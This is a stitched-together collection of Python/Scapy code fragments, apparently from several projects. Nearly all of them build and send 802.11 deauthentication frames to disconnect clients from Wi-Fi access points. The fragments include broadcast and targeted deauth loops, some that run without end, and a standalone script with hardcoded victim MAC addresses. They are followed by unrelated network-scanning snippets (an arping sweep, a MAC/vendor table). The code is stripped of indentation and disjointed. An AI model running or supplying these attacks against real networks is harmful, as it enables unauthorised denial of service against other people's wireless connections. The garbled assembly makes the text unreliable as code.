def send(bssid, client, count):
pckt_to_ap = RadioTap() / Dot11(addr1=client, addr2=bssid,
addr3=bssid) / Dot11Deauth()
pckt_to_client = None
if client != 'FF:FF:FF:FF:FF:FF':
pckt_to_client = RadioTap() / Dot11(
addr1=bssid, addr2=client, addr3=bssid) / Dot11Deauth()
print('Sending Deauth to ' + client + ' from ' + bssid)
if not count:
print('Press CTRL+C to quit')
# We will do like aireplay does and send the packets in bursts of 64, then sleep for half a sec or so
while count != 0:
try:
for i in range(64):
sendp(pckt_to_ap,
verbose=0) # Send deauthentication frame to the AP
if pckt_to_client:
sendp(pckt_to_client
) # Send deauthentication frame to the Client
os.write(1, b".") # show sending status
count -= 1 # If count was -1, this will be an infinite loop
os.write(1, b"\r") # clear one line
time.sleep(.5)
except KeyboardInterrupt:
break
def interpret_targets(self, ap_targets, client_targets):
if not self._targeted_only:
for access_point in ap_targets:
deauth_packet = RadioTap() / \
Dot11(type=0,subtype=12, addr1="FF:FF:FF:FF:FF:FF", \
addr2=access_point.bssid, \
addr3=access_point.bssid) / \
Dot11Deauth(reason=7)
self.packets.add(deauth_packet)
for client in client_targets:
mac = client.client_mac
bssid = client.associated_bssid
if bssid == None:
continue
deauth_packet1 = RadioTap() / \
Dot11(type=0,subtype=12, addr1=bssid, addr2=mac, addr3=mac) / \
Dot11Deauth(reason=7)
deauth_packet2 = RadioTap() / \
Dot11(type=0,subtype=12, addr1=mac, addr2=bssid, addr3=bssid) / \
Dot11Deauth(reason=7)
self.packets.add(deauth_packet1)
self.packets.add(deauth_packet2)
def craft_deauth_packets(self, client_mac, ap_bssid): # Craft Deauthentication packets with multiple reason codes deauthentication_packets = [] for reason_code in range(6, 20): deauth_packet1 = RadioTap() / \ Dot11(type=0,subtype=12, addr1=ap_bssid, addr2=client_mac, addr3=client_mac) / \ Dot11Deauth(reason=reason_code) deauth_packet2 = RadioTap() / \ Dot11(type=0,subtype=12, addr1=client_mac, addr2=ap_bssid, addr3=ap_bssid) / \ Dot11Deauth(reason=reason_code) deauthentication_packets.append(deauth_packet1) deauthentication_packets.append(deauth_packet2) return deauthentication_packets
def deauthentication_attack(self):
# Based on:
# https://raidersec.blogspot.pt/2013/01/wireless-deauth-attack-using-aireplay.html
packets = []
if not self._targeted_only:
for DeauthAP in self.aps_to_deauth:
deauth_packet = RadioTap() / \
Dot11(type=0,subtype=12, addr1="FF:FF:FF:FF:FF:FF", addr2=DeauthAP.bssid, addr3=DeauthAP.bssid) / \
Dot11Deauth(reason=7)
packets.append(deauth_packet)
for client in self.clients_to_deauth:
mac = client.client_mac
bssid = client.bssid
deauth_packet1 = RadioTap() / \
Dot11(type=0,subtype=12, addr1=bssid, addr2=mac, addr3=mac) / \
Dot11Deauth(reason=7)
deauth_packet2 = RadioTap() / \
Dot11(type=0,subtype=12, addr1=mac, addr2=bssid, addr3=bssid) / \
Dot11Deauth(reason=7)
packets.append(deauth_packet1)
packets.append(deauth_packet2)
count = self._burst_count if self._burst_count > 0 else 5
print dedent("[+] Starting deauthentication attack \n\
- {nburst} bursts of 20 packets \n\
- {npackets} different packets").format( nburst=self._burst_count,
npackets=len(packets))
try:
while count >= 0 and self.deauth_running:
for packet in packets:
sendp(packet, iface = self.running_interface, count = 2, inter = 0.1, verbose=0)
count -= 1
except socket_error as e:
if not e.errno == 100:
print e
traceback.print_exc()
except Exception as e:
print "Exception: {}".format(e)
print "[-] Stopping deauthentication attack."
self.deauth_running = False
self._restore_deauthor_state()
print "[+] Deauthentication attack finished executing."
def deauth(self,
wireless_interface: str = 'wlan0',
bssid: str = '01:23:45:67:89:0a',
client: str = '01:23:45:67:89:0b',
delay: int = 5,
number_of_deauth_packets: int = 5) -> None:
"""
Sending 802.11 deauth packets
:param wireless_interface: A wireless interface name for sending deauth packets (default: 'wlan0')
:param bssid: BSSID (example: '01:23:45:67:89:0a')
:param client: A client MAC address for deauth (example: '01:23:45:67:89:0b')
:param delay: A delay between sending deauth packets (default: 5)
:param number_of_deauth_packets: The number of deauth packets for one iteration (default: 5)
:return: None
"""
deauth_packet: bytes = RadioTap() / \
Dot11(type=0, subtype=12, addr1=client.lower(),
addr2=bssid.lower(), addr3=bssid.lower()) / \
Dot11Deauth(reason=7)
sleep(delay)
while True:
sendp(deauth_packet,
iface=wireless_interface,
count=number_of_deauth_packets,
verbose=False)
self.print_info('Send ', str(number_of_deauth_packets),
' deauth packets to: ', client, ' from: ', bssid)
sleep(delay)
def deauth(iface: str, count: int, bssid: str, target_mac: str):
"""
- addr1=target_mac specifies that this packet will go to the victim's computer
- addr2=bssid specifies the MAC address of the AP
- addr3=bssid is the same as addr2
"""
dot11 = Dot11(addr1=target_mac, addr2=bssid, addr3=bssid)
frame = RadioTap()/dot11/Dot11Deauth()
sendp(frame, iface=iface, count=count, inter=0.100)
def deauth(self, iface: NetworkInterface, count = 1):
d11 = RadioTap() / Dot11(
addr1 = 'ff:ff:ff:ff:ff:ff',
addr2 = self.bssid, addr3 = self.bssid
)
pkt = d11 / Dot11Deauth(reason = 3)
iface.set_channel(self.channel)
iface.send(pkt, verbose = False, inter = 0.75, count = count)
def interpret_targets(self, ap_targets, client_targets):
"""
A broadcast Deauth packet is created for every access point in the list.
A directed Deauth packet is created for every client in the list.
"""
# Packet creation based on:
# https://raidersec.blogspot.pt/2013/01/wireless-deauth-attack-using-aireplay.html
if not self._targeted_only:
for access_point in ap_targets:
deauth_packet = RadioTap() / \
Dot11(type=0, subtype=12, addr1="FF:FF:FF:FF:FF:FF",
addr2=access_point.bssid,
addr3=access_point.bssid) / \
Dot11Deauth(reason=7)
self.packets.add(deauth_packet)
SessionManager().log_event(NeutralEvent("Added AP with BSSID '{}' as deauthentication target."
.format(access_point.bssid)))
for client in client_targets:
mac = client.client_mac
bssid = client.associated_bssid
if bssid is None:
continue
deauth_packet1 = RadioTap() / \
Dot11(type=0, subtype=12, addr1=bssid, addr2=mac, addr3=mac) / \
Dot11Deauth(reason=7)
deauth_packet2 = RadioTap() / \
Dot11(type=0, subtype=12, addr1=mac, addr2=bssid, addr3=bssid) / \
Dot11Deauth(reason=7)
self.packets.add(deauth_packet1)
self.packets.add(deauth_packet2)
SessionManager().log_event(NeutralEvent("Added Client with MAC '{}' as deauthentication target."
.format(mac)))
def _build_deauth_packet(self, seq, source, dest):
body = Dot11Deauth(reason=self.DEFAULT_DEAUTH_REASON)
return self._build_packet(seq, source, dest, body)
def deauthAttack(config):
#enable monitor mode and set the channel.
setMonitorMode(config["iface"])
setChannel(str(config["iface"]), config["channel"])
timeToRun = (time.time() + config["time"])
packetToClient = RadioTap()/Dot11(type=0,subtype=12,addr1=config["mac"],addr2=config["bssid"],addr3=config["bssid"])/Dot11Deauth(reason=7)
packetToAP = RadioTap()/Dot11(type=0,subtype=12,addr1=config["bssid"],addr2=config["mac"],addr3=config["mac"])/Dot11Deauth(reason=7)
print("DA:" + str(config["mac"]) + " SA: " + str(config["bssid"]) + " BSSID: " + str(config["bssid"]))
printTime()
b = 1
while(time.time() < timeToRun):
if (config["amount"]):
for i in range(int(config["amount"])):
sendp(packetToAP, iface=config["iface"], loop=0, verbose=0)
sendp(packetToClient, iface=config["iface"], loop=0, verbose=0)
sleep(config["interval"])
else:
print(str(b) + " frame(s) send.. ")
printTime()
sendp(packetToAP, iface=config["iface"], loop=0, verbose=0)
sendp(packetToClient, iface=config["iface"], loop=0, verbose=0)
time.sleep(config["interval"])
b+=1
printTime()
final = pd.DataFrame()
final['IP'] = iplists
final['Mac'] = maclist
final['Vendor'] = vendorlist
from scapy.all import Dot11, RadioTap, sendp, Dot11Deauth
target_mac = "'8c:85:90:5c:2d:94'"
gateway_mac = "b0:52:16:f8:34:dd"
# 802.11 frame
# addr1: destination MAC
# addr2: source MAC
# addr3: Access Point MAC
dot11 = Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
# stack them up
packet = RadioTap() / dot11 / Dot11Deauth(reason=7)
# send the packet
sendp(packet, inter=0.1, count=100, verbose=1)
import scapy.all as scapy
scapy.arping('192.168.0.0/24')
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 13 02:40:49 2020
@author: haris
"""
import socket
from netaddr import *